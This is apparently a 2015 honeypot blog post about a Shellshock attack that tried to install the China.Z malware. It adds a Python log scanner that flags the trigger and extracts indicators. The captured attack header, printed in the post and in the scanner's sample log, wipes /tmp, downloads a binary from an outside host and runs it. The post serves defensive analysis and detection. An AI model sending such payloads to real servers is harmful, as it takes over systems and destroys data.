Wednesday, 15 April 2015

China.Z malware

On the 12th of April my honeypot server received a shell injection attack attempt.
The target was to download and run the China.Z malware.

27.17.5.140 - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
Today the malware was no longer available for download, so if you need additional information please refer to VirusTotal.

The source IP address is located in China.
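The `() { :; };` prefix in the Referer and User-Agent fields is the classic Shellshock trigger: a CGI handler exports the header into an environment variable and a vulnerable bash parses the trailing commands. The following Python is an added example, not code from the original post: it parses lines in Apache "combined" format, flags entries whose quoted fields carry that function-definition pattern, and pulls out the download URLs and /tmp drop paths as indicators for blocking and hunting. The sample log embeds the post's own honeypot line plus a constructed benign request; the regexes and the `Hit` structure are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the honeypot line from the post followed by one benign request.
SAMPLE_LOG = r'''
27.17.5.140 - - [12/Apr/2015:14:10:20 +0200] "GET / HTTP/1.1" 404 442 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.212.172:911/java -O /tmp/China.Z-wxvm >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-wxvm >> /tmp/Run.sh;echo /tmp/China.Z-wxvm >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
192.0.2.10 - - [12/Apr/2015:14:11:02 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# Apache/nginx "combined" format. Quoted fields may contain backslash-escaped
# quotes (as in the attack line), which the (?:[^"\\]|\\.)* sub-pattern accepts.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Shellshock trigger: a bash function definition "() {" placed in a header
# that a CGI handler would export as an environment variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')
URL_RE = re.compile(r'https?://[^\s"\'\\;]+')
TMP_PATH_RE = re.compile(r'/tmp/[\w.\-]+')


@dataclass
class Hit:
    src_ip: str
    timestamp: str
    fields: List[str]       # which quoted fields carried the trigger pattern
    urls: List[str]         # payload download URLs (network indicators)
    drop_paths: List[str]   # /tmp paths the payload writes (host indicators)


def inspect_line(line: str) -> Optional[Hit]:
    """Return a Hit if the log line carries a Shellshock-style payload, else None."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None  # not a combined-format line; ignore rather than guess
    flagged = [f for f in ("request", "referer", "ua") if SHELLSHOCK_RE.search(m.group(f))]
    if not flagged:
        return None
    payload = " ".join(m.group(f) for f in flagged)
    return Hit(
        src_ip=m.group("ip"),
        timestamp=m.group("ts"),
        fields=flagged,
        urls=sorted(set(URL_RE.findall(payload))),
        drop_paths=sorted(set(TMP_PATH_RE.findall(payload))),
    )


def scan(log_text: str) -> List[Hit]:
    """Scan a whole access log and return every flagged entry."""
    return [h for h in (inspect_line(l) for l in log_text.splitlines()) if h]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.timestamp} {hit.src_ip} shellshock in {','.join(hit.fields)}")
        print("  download URLs:", ", ".join(hit.urls))
        print("  drop paths:   ", ", ".join(hit.drop_paths))
```

The extracted URL host and the `/tmp/China.Z-*` and `/tmp/Run.sh` paths are what you would feed into an egress block list and a host-level file search; the source IP alone is a weak indicator, since scanners of this kind rotate through many addresses.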